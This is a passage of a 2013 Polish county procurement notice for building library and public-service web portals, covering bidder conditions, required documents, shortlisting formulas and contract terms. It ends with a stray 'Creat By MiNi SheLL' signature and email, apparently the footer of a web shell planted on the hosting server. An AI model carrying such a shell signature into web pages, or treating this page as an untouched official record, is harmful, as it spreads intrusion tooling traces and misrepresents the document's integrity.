<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 240.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustalił szczegółowych warunków dotyczących posiadania uprawnień do wykonywania określonej działalności lub czynności.
Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 1 ustawy Pzp, o którym mowa w sekcji III.4.1) siwz (zał. nr 2 do wniosku). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie posiadania wiedzy i doświadczenia 
w zakresie wykonania w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej dwóch usług polegających na zaprojektowaniu, wykonaniu i wdrożeniu minimum dwujęzycznego systemu portalowego o charakterze informacyjnym, wyposażonego w system zarządzania treścią (CMS), umożliwiającego budowę odrębnych, tematycznych podstron zawierających m.in. galerie zdjęć i-lub galerie i prezentacje plików wideo wraz z kalendarium, wirtualnym spacerem, modułem ankiet, forum, newsletterem - o wartości co najmniej 50.000,- PLN (należy wskazać adresy stron internetowych).
           
     Wartości pieniężne wskazane w dokumentach złożonych w celu wykazania przez wykonawcę warunku udziału w postępowaniu jw., podane w walutach obcych, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 

Obowiązek wskazania w wykazie, o którym mowa w sekcji III.4.1) tiret 1, głównych usług wykonanych przez Wykonawcę, dotyczy usług zrealizowanych w zakresie wymaganym w sekcji III.3.2).

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.                
Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 2 ustawy Pzp, o którym mowa w sekcji III.4.1) (zał. nr 2 do wniosku) oraz dokumentów, o których mowa w sekcji III.4.1) tiret 1. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych warunków dotyczących dysponowania potencjałem technicznym.
Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 3 ustawy Pzp, o którym mowa w sekcji III.4.1) (zał. nr 2 do wniosku). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, jn.: 

1)Jedną osobą, której Wykonawca zamierza powierzyć obowiązki  koordynatora/szefa projektu - wskazana osoba musi posiadać minimum 3-letnie doświadczenie w zakresie pełnienia funkcji koordynatora/szefa projektu, w tym co najmniej w zakresie jednej usługi polegającej na zaprojektowaniu, wykonaniu i wdrożeniu serwisu internetowego o wartości  minimum  50.000,-  PLN (należy wskazać adres strony internetowej).

2)Co najmniej jedną osobą, której Wykonawca powierzy funkcję projektanta - wskazana osoba musi posiadać doświadczenie na stanowisku projektanta przy realizacji co najmniej dwóch serwisów internetowych (należy wskazać adresy stron internetowych).

3)Co najmniej dwiema osobami, którym Wykonawca zamierza powierzyć funkcję  programisty - wskazane osoby muszą posiadać minimum 2-letnie doświadczenie w programowaniu serwisów internetowych w technologii co najmniej HTML/XHTML, CSS, PHP, Javascript, Flash lub HTML5, w tym muszą posiadać doświadczenie na stanowisku programisty - projektanta baz danych serwisów internetowych przy realizacji co najmniej dwóch serwisów internetowych (należy wskazać adresy stron internetowych).

4)Co najmniej jedną osobą, której Wykonawca zamierza powierzyć funkcję grafika -  wskazana osoba musi posiadać doświadczenie na stanowisku grafika przy realizacji co najmniej dwóch portali internetowych (należy wskazać adresy stron internetowych).

Zamawiający nie dopuszcza możliwości łączenia funkcji programisty i grafika z innymi funkcjami określonymi dla potrzeb niniejszego postępowania, o których mowa w sekcji III.3.4).

Wartości pieniężne wskazane w dokumentach złożonych w celu wykazania przez wykonawcę warunku udziału w postępowaniu jw., podane w walutach obcych, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 3 ustawy Pzp, o którym mowa w sekcji III.4.1) (zał. nr 2 do wniosku) oraz dokumentów, o których mowa w sekcji III.4.1)tiret 3. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie, że wykonawca posiada środki finansowe lub zdolność kredytową  na kwotę min. 100.000,- PLN.

Wartości pieniężne wskazane w dokumentach muszą być wyrażone konkretną cyfrą w PLN. Wartości pieniężne wskazane w dokumentach złożonych w celu wykazania przez wykonawcę warunku udziału w postępowaniu jw., podane w walutach obcych, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 

Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 4 ustawy Pzp, o którym mowa w sekcji III.4.1) (zał. nr 2 do wniosku) oraz dokumentu, o którym mowa w sekcji III.4.1) tiret 4. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>obowiązek wskazania przez wykonawcę w wykazie dotyczy usług potwierdzających posiadanie przez wykonawców wiedzy i doświadczenia w zakresie wymaganym w sekcji III.3.2);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wniosek o dopuszczenie do udziału w postępowaniu (wzór wniosku podany na stronie internetowej zamawiającego) - http://bip.warmia.mazury.pl/powiat_ostrodzki/;
2)W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. Wzór pełnomocnictwa stanowi załącznik nr 6 do wzoru wniosku dostępny na stronie internetowej zamawiającego - http://bip.warmia.mazury.pl/powiat_ostrodzki/ 3)W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu: 3
Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:
Każdy wykonawca musi wykazać spełnianie warunków udziału w postępowaniu, o których mowa w sekcji III.3, nie później niż na dzień składania wniosków o dopuszczenie do udziału w postępowaniu. Spełnianie warunków udziału w postępowaniu zostanie ocenione na zasadzie spełnia-nie spełnia. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu w zakresie wskazanym przez Zamawiającego w sekcji III.3, będzie mniejsza niż 3 lub równa 3, Zamawiający zaprosi do składania ofert wstępnych wszystkich wykonawców spełniających te warunki. W przypadku, gdy liczba wykonawców, którzy wykażą spełnianie warunków udziału w postępowaniu będzie większa niż 3, Zamawiający zaprosi do składania ofert wstępnych tych wykonawców, którzy uzyskają najwyższą ilość punktów, jn.:
1) wiedza i doświadczenie    - 60 %
2) sytuacja ekonomiczna i finansowa   - 40 %

Ad. 1) W zakresie posiadanej wiedzy i doświadczenia punkty będą przyznawane w następujący sposób:
             
WiD =  (WiD badane : WiD maksymalne) x 10 pkt. x 60 %,

gdzie:
WiD  - ilość uzyskanych punktów w kryterium wiedzy i doświadczenia w badanym wniosku;
WiD badane  - ilość zrealizowanych portali w badanym wniosku, spełniających warunek posiadania wiedzy i doświadczenia, o którym mowa w sekcji III.3.2);
WiD maksymalne   - największa ilość zrealizowanych portali spośród badanych wniosków, spełniających warunek posiadania wiedzy i doświadczenia, o którym mowa w sekcji III.3.2);

Ad. 2) W zakresie sytuacji ekonomicznej i finansowej punkty będą przyznawane w następujący sposób:
         
F = (F badane : F maksymalne)  x 10 pkt. x 40 %,

gdzie:
F - ilość uzyskanych punktów w zakresie sytuacji ekonomicznej i finansowej w badanym wniosku;
F badane  - wysokość posiadanych środków finansowych lub zdolność kredytowa Wykonawcy wynikająca z badanego wniosku, spełniająca warunek pozostawania w sytuacji ekonomicznej i finansowej, o którym mowa w sekcji III.3.5);
F maksymalne  - najwyższe posiadane środki finansowe lub zdolność kredytowa spośród badanych wniosków, spełniające warunek pozostawania w sytuacji ekonomicznej i finansowej, o którym mowa w sekcji III.3.5)

Zamawiający zaprosi do składania ofert wstępnych 3 wykonawców, którzy uzyskają największą sumę punktów w ww. kryteriach oceny wniosków. W przypadku, gdy nie będzie można dokonać zakwalifikowania 3 wykonawców z uwagi to, że dwa lub więcej wniosków uzyskało taką samą liczbę punktów, Zamawiający spośród tych wniosków wybierze te, w których wykonawcy wykażą się największą liczbą samodzielnie zrealizowanych portali spełniających warunek udziału w postępowaniu w zakresie wiedzy i doświadczenia, o którym mowa w sekcji III.3.2). Jeśli i to kryterium nie przyniesie rozstrzygnięcia, Zamawiający spośród tych wniosków wybierze te, których suma wartości wykonanych portali podlegających ocenie będzie najwyższa</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wynagrodzenie przysługujące Wykonawcy, może ulec zmianie w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT. Zmiana wynagrodzenia z uwagi na ustawową zmianę stawki podatku od towarów i usług VAT wymaga aneksu do umowy.
2.Termin realizacji przedmiotu umowy, może ulec zmianie w przypadku wystąpienia okoliczności, za które żadna ze Stron nie ponosi odpowiedzialności, tzw. siły wyższej.
3.Pod pojęciem siły wyższej Strony rozumieją okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań w normalnych zakresie, nie mogą być przez Strony przewidziane oraz którym Strony nie mogą zapobiec, bądź się im przeciwstawić w sposób skuteczny. 
4.Wstrzymanie realizacji przedmiotu umowy z powodu okoliczności określonych w pkt. 3 wymaga aneksu do umowy przedłużającego okres realizacji umowy o czas wstrzymania usługi. Strony nie ponoszą odpowiedzialności za niewykonanie lub nienależyte wykonanie zobowiązań wynikających z umowy powstałych na wskutek siły wyższej. 
5.Warunkiem wprowadzenia zmian zawartej umowy dotyczącej terminu realizacji jest:
1)sporządzenie podpisanego przez Strony protokołu konieczności określającego przyczyny zmiany terminu oraz potwierdzającego wystąpienie okoliczności wymienionej w pkt 3- 4; protokół konieczności będzie załącznikiem do aneksu zmieniającego niniejszą umowę;
2)uzyskanie zgody Instytucji Zarządzającej środkami finansowymi, o których mowa w sekcji IV.4.16)
6.Zmiana którejkolwiek z osób, wskazanych we wniosku o dopuszcza do negocjacji w trakcie realizacji przedmiotu niniejszej umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji i wyłącznie wtedy, gdy kwalifikacje wskazanych osób będą takie same lub wyższe od kwalifikacji osób wymaganych w postępowaniu o udzielenie zamówienia będącego przedmiotem umowy.
7.Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, o której mowa w pkt 6 nie później niż 5 dni przed planowaną zmianą danej osoby.
8.Skierowanie, bez akceptacji Zamawiającego, do świadczenia usługi innych osób niż wskazane we wniosku może stanowić podstawę do rozwiązania umowy z winy Wykonawcy.
9.Zaakceptowana przez Zamawiającego zmiana którejkolwiek z osób wskazanych we wniosku, winna być dokonana w formie pisemnej informacji i nie wymaga aneksu do niniejszej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zgodnie z art. 57 ust. 5 ustawy Prawo zamówień publicznych- specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcom wraz z zaproszeniem do składania ofert wstępnych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2013 godzina 10:00, miejsce: Powiat Ostródzki z siedzibą w Ostródzie, 14-100 Ostróda, ul. Jana III Sobieskiego 5, pokój 218 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Sposób przygotowania wniosku o dopuszczenie do udziału w negocjacjach: 1. Wykonawca może złożyć tylko jeden wniosek o dopuszczenie do udziału w postepowaniu. 2. Wniosek o dopuszczenie do udziału w postępowaniu, oferta wstępna oraz oferta, muszą być złożone w formie pisemnej pod rygorem nieważności. 3. Wraz z wnioskiem należy złożyć niżej wymienione oświadczenia i dokumenty: a) Pełnomocnictwo w przypadku ustanowienia przez wykonawcę pełnomocnika. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem (postępowaniami) o udzielenie zamówienia publicznego, w szczególności podpisania i złożenia wniosku o dopuszczenie do udziału w postępowaniu. b) Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik powinien być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy (zał.6 do wzoru wniosku). c) Oświadczenia i dokumenty, o których mowa w Sekcji III ogłoszenia o zamówieniu. 4. Pełnomocnictwa, o których mowa w pkt 3 lit. a i b muszą być złożone w oryginale lub notarialnie potwierdzonej kopii. Wymagane do wniosku oświadczenia należy złożyć w oryginale. Dokumenty składane wraz z wnioskiem o dopuszczenie do udziału w postępowaniu, inne niż pełnomocnictwo i oświadczenie, mogą być złożone w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę. 5. Wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami powinien być sporządzony w języku polskim. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów trzecich, kopie dokumentów dotyczących każdego z wykonawców lub podmiotów trzecich są poświadczane za zgodność z oryginałem odpowiednio przez tego wykonawcę lub te podmioty. 7. Wniosek  wraz z załącznikami należy umieścić w zamkniętej kopercie oznaczonej nazwą firmy i adresem wykonawcy oraz tytułem: Wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia na: Utworzenie portali internetowych do Biblioteki Powiatowej oraz Centrum Użyteczności Publicznej.  Wniosek należy zaadresować jak poniżej: POWIAT OSTRÓDZKI Z SIEDZIBĄ W OSTRÓDZIE ul. Jana III Sobieskiego 5, 14-100 Ostróda. 8. Oświadczenia, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną. 9. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. 10. Formularz wniosku o dopuszczenie do udziału w postępowaniu wraz z załącznikami będzie udostępniony na stronie internetowej prowadzącego postępowanie bip.warmia.mazury.pl/powiat_ostrodzki/. 11. SIWZ zostanie przekazana Wykonawcom nieodpłatnie wraz z zaproszeniem do składania ofert wstępnych. 12. Oferta wstępna będzie musiała zawierać:
1)Wypełniony i podpisany formularz oferty wstępnej (zał. nr 1 do siwz).
2)Koncepcję graficzną wyglądu i funkcjonalności portalu wraz z opisem technicznym
3)Oświadczenie Wykonawcy dotyczące przeniesienia na Zamawiającego autorskich praw majątkowych  (zał. nr 2 do siwz).
13. Zamówienie jest współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013. Priorytet: 7 Infrastruktura społeczeństwa informacyjnego. Działanie 7.2  Promocja i ułatwianie dostępu do usług teleinformatycznych. Poddziałanie 7.2.1. Usługi i aplikacje dla obywateli.
14. Zamawiający nie przewiduje możliwości udzielania zamówień uzupełniających.
15. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
16. Termin realizacji przedmiotu zamówienia:
Część 1 - Portal e-CUP  - 240 dni od dnia podpisania umowy; Część 2 - Portal bibliotek@ - 60 dni od dnia podpisania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com